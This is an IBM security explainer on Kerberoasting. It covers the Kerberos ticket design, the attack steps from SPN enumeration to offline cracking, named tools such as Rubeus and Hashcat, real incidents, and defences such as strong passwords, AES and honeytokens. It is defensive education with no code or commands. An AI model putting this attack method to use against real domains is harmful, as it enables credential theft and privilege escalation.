Published: 13 May 2024
Contributor: Matthew Kosinski
Kerberoasting is a cyberattack that exploits the Kerberos authentication protocol. Threat actors steal Kerberos service tickets to uncover the plaintext passwords of network service accounts. The hackers then take control of these service accounts to steal data, spread malware and more.
Kerberoasting is growing more common. IBM's X-Force® security analysts saw a 100% increase in Kerberoasting incidents between 2022 and 2023, according to the X-Force Threat Intelligence Index. This growth is part of a broad trend of hackers abusing valid accounts to breach networks. Improvements in network and endpoint security have made direct attacks much harder to pull off.
A few additional factors fuel Kerberoasting's popularity. Many directory services and cloud computing systems use Kerberos, which means that hackers can leverage the protocol to gain access to critical network infrastructure.
In particular, Kerberos is standard in Microsoft Windows Active Directory, and many Keberoasting attacks target Active Directory domains. Plus, manually created service accounts tend to have weak passwords and high privileges, making them attractive targets.
Kerberoasting attacks are difficult to detect because they take advantage of Kerberos's intended design. The most suspicious part of a Kerberoasting attack—decrypting the stolen tickets—happens offline. Cybersecurity professionals can't completely eradicate the possibility of Kerberoasting, but they can deploy proactive defenses to mitigate the threat.
Get essential insights to help your security and IT teams better manage risk and limit potential losses.
Kerberoasting is typically a means of privilege escalation rather than an initial break-in tactic. After a hacker gains control of a domain user account to get into the network, they use Keberoasting to expand their reach.
Most Kerberoasting attacks follow the same basic method:
- A hacker uses a compromised account to obtain Kerberos service tickets.
- The hacker takes these tickets to a computer that they own outside of the network they're attacking.
- The hacker decrypts the tickets and uncovers the passwords of the service accounts that run the services associated with each ticket.
- The hacker logs in to the network using the credentials of the service accounts, abusing their permissions to move through the network and cause harm.
To understand why Keberoasting works, one must first understand the basics of Kerberos.
Kerberos is an authentication protocol that lets users and services (such as apps, databases and servers) securely authenticate and communicate within Active Directory and other domains.
The Kerberos authentication process uses a ticketing system. At the heart of this system is the key distribution center (KDC), which operates on the network's domain controller.
The KDC is essentially the gatekeeper of the domain. It authenticates users and services on the network and issues them tickets. Tickets are credentials that prove users’ identities and allow them to access other resources on the network. The users and services exchange these tickets to verify themselves to one another.
When a user logs in to a domain, they first authenticate with the KDC and receive a ticket-granting ticket (TGT). This TGT enables the user to request access to domain services.
When the user wants to access a service, they send a request to the KDC's ticket-granting service (TGS). The TGT accompanies this request to vouch for the user's identity.
In response, the KDC issues a service ticket, also called a "TGS ticket," which is encrypted using the service account password. This happens to ensure that only the target service can validate the user’s access request. The user presents this service ticket to the target service, which authenticates the user and begins a secure session.
There are a few details of Kerberos’s design that leave it open to Kerberoasting.
First, the KDC does not check whether users are authorized to access a service. Any user can request a ticket for any service. It is up to the individual services to enforce permissions and block unauthorized users. Therefore, hackers don't need to seize the accounts of domain admins or other privileged users. Any compromised account works.
Second, each service in a Kerberos domain must be associated with a service account that is responsible for running the service on the domain. Service accounts enable Kerberos to authenticate services, issue service tickets and enforce security controls. These accounts also give hackers a target, as they tend to have high privileges.
Third, Kerberos tickets are encrypted, using the associated accounts' password hashes as keys. Importantly for Kerberoasting, service tickets use the password hashes of the relevant service accounts.
Account passwords are convenient symmetric encryption keys because only the KDC and the related service should know that password. But, because tickets are encrypted using password hashes, hackers can reverse-engineer service account passwords by cracking a ticket's encryption.
Additionally, manually configured service accounts often have the “password never expires” flag enabled. In long-standing networks, this can mean that service accounts use very old passwords that follow outdated security guidelines, making them easy to crack.
The first step in a typical Kerberoasting attack is to steal a domain user's account. A hacker can use many cyberattack methods at this stage, such as phishing, keyloggers or other techniques. The hacker can then use this account to access the target domain.
When the hacker is in the network, they search for service accounts. They often do this by looking for accounts with Service Principal Names (SPNs). SPNs are unique identifiers that tie services to their service accounts in a Kerberos domain. Because only service accounts have this attribute, enumeration of the accounts with SPNs is a handy way for hackers to find targets. Every domain account can enumerate SPNs by default.
Hackers can use PowerShell commands and Lightweight Directory Access Protocol (LDAP) queries to surface accounts with SPNs. They can also use specialized hacking and penetration testing tools. For example, the Impacket toolkit includes a script called "GetUserSPNs.py" that generates a list of service accounts in a domain.
The hacker uses the hijacked domain account to request service tickets for their targeted services.
The hacker doesn't use these tickets to access those services. They could, but they would have only the limited permissions of the likely low-level stolen user account. Instead, the hacker takes these tickets out of the network to a computer they control.
The hacker decrypts the stolen tickets to retrieve the service accounts' passwords.
Because the tickets use the service accounts' passwords as cryptographic keys, hackers typically use brute force attacks for this effort. They systematically use different passwords to generate encryption keys (“hashes”) that they use on the stolen ticket. If an encryption key works, then the password that generated the key is the service account's password.
Hackers can speed up decryption by using wordlists of common passwords. They also use various tools to automate the cracking process. Some of the most common Kerberoasting tools include:
Impacket: A Python toolkit designed for pen testers. It includes some scripts that can do real damage in a hacker's hands.
Rubeus: A toolset designed to exploit Kerberos for penetration testing. Like many ethical hacking tools, it can be used by unethical hackers for malicious ends.
John the Ripper and Hashcat: Password crackers that can run brute force attacks.
Mimikatz: Helps hackers extract and crack Kerberos tickets.
Ticket cracking is the biggest red flag in the Kerberoasting process, but it typically happens outside the target network on a device that hackers control. The organization's security tools cannot detect it.
Armed with a service account's password, the hacker can log in to that account and use its permissions to access sensitive resources, make lateral movements and more.
For example, if a hacker cracks the password of an SQL server's service account, they could gain control of the databases hosted on that server.
While Kerberoasting normally requires a compromised domain user account, security researcher Charlie Clark discovered an attack technique that lets hackers steal service tickets without hijacking an account under the right conditions.1
Recall that before a user can receive service tickets, they must authenticate with the KDC and get a TGT that allows them to request service access. Using the Kerberos exploitation tool Rubeus, Clark was able to modify this initial authentication request so that it asked for a service ticket instead of a TGT. It worked, and the KDC responded with a service ticket.
This method does have limited applications. For the technique to work, the hacker must pretend to send the authentication request from an account that does not require preauthentication in Kerberos. Accounts that require preauthentication, which most do, need user credentials to even send the initial authentication request that Clark modified. Still, this technique opens a potential avenue for attackers.
Hackers have used Kerberoasting techniques in some of the most significant cyberattacks of the last few years.
In the 2020 SolarWinds attack, Russian state hackers spread malware by disguising it as a legitimate update to SolarWinds's Orion infrastructure management platform. The hackers breached several companies and government agencies, including the US State and Justice Departments. According to Mitre, the hackers used Kerberoasting to escalate their privileges in compromised systems.2
Likewise, hackers associated with the Akira ransomware often use Kerberoasting to expand their reach and maintain access to the networks they breach. As of April 2024, Akira has hit 250 organizations worldwide, extorting a total of USD 42 million in ransom payments.3
While golden ticket attacks also target Kerberos authentication processes, they differ from Keberoasting.
In Kerberoasting, hackers steal and crack tickets to uncover passwords and take over service accounts.
In a golden ticket attack, a hacker first gains administrator-level privileges in a domain. This allows them to access the password of the krbtgt account, which is the account used by the KDC to encrypt TGTs. The hacker uses these privileges to create rogue Kerberos tickets that let them pretend to be any user and gain virtually unrestricted access to network resources.
Kerberoasting attacks are hard to spot because the attackers spend much of their time masquerading as legitimate accounts. Their ticket requests blend in with real ones, and the actual password cracking happens outside the network.
That said, there are tools and practices organizations can use to reduce the chances of a successful attack and better intercept Kerberoasting in progress.
Because Kerberoasting attacks seize control of domain accounts, protecting these accounts with enhanced IAM controls can help thwart some breaches.
Strong password policies and practices, including centralized password management solutions, can make it harder for hackers to crack passwords. The MITRE ATT&CK framework, for example, recommends that service account passwords be at least 25 characters long, sufficiently complex and regularly changed.4
In Active Directory, organizations can use Group Managed Service Accounts. These are service accounts that automatically generate, manage and regularly change passwords, so admins don't need to manage passwords manually.
Strong authentication, like adaptive or multifactor authentication (MFA), can also help protect user accounts from theft. That said, it is often challenging and inefficient to use MFA for service accounts.
Privileged access management tools can help provide extra security for the credentials of privileged accounts, such as Kerberos service accounts and other highly valued targets.
By limiting service account privileges to the permissions they need, organizations can minimize the damage hackers can do by compromising those accounts.
Additionally, service accounts can be limited to noninteractive logons and only on specific services and systems.
Malicious ticket requests often blend in with legitimate ones, but hackers might leave telltale signs. For example, an account requesting many tickets for many services at once might be carrying out a Kerberoasting attack.
Event logs like Windows Event Viewer or a security information and event management (SIEM) system can help security teams detect suspicious activity. Tools that monitor users, like a user behavior analytics (UBA) solution, can help detect hackers who have hijacked legitimate accounts.
Security teams can catch more threat activity by aligning monitoring tools to their information systems. For example, tools can be configured so that any attempt by a service account to log on outside of its predefined scope triggers an alert and requires investigation.
Many instances of Kerberos still support the RC4 encryption algorithm. However, this older encryption standard is relatively easy for hackers to break.
Enabling a stronger encryption type, like AES, can make it more difficult for hackers to crack tickets.
Some organizations create honeytokens, fake domain accounts that are meant to be compromised. When hackers attack a honeytoken, an alert is automatically raised so the security team can act.
Honeytokens are designed to take attention away from real accounts, often by seeming to have weak credentials and high privileges.
Discover, control, manage and protect privileged accounts across endpoints and hybrid multicloud environments.
Add deep context, intelligence and security to decisions about which users should have access to your organization’s data and applications, on premises or in the cloud.
Comprehensive, secure and compliant identity and access management for the modern enterprise.
Learn from the challenges and successes of security teams around the world, based on insights and observations obtained from monitoring over 150 billion security events per day in more than 130 countries.
Identity orchestration is a software solution for coordinating disparate identity and access management (IAM) systems from multiple identity providers into frictionless workflows.
The more security teams and employees know about the different types of cybersecurity threats, the more effectively they can prevent, prepare for, and respond to cyberattacks.
Footnotes
All links reside outside ibm.com
1 Clark, Charlie. New Attack Paths? As Requested Service Tickets. Semperis. 27 September 2022.
2 SolarWinds Compromise. MITRE ATT&CK. 14 April 2023.
3 StopRansomware: Akira Ransomware. Cybersecurity and Infrastructure Security Agency (CISA). 18 April 2024.
4 Steal or Forge Kerberos Tickets: Kerberoasting. MITRE ATT&CK. 30 March 2023.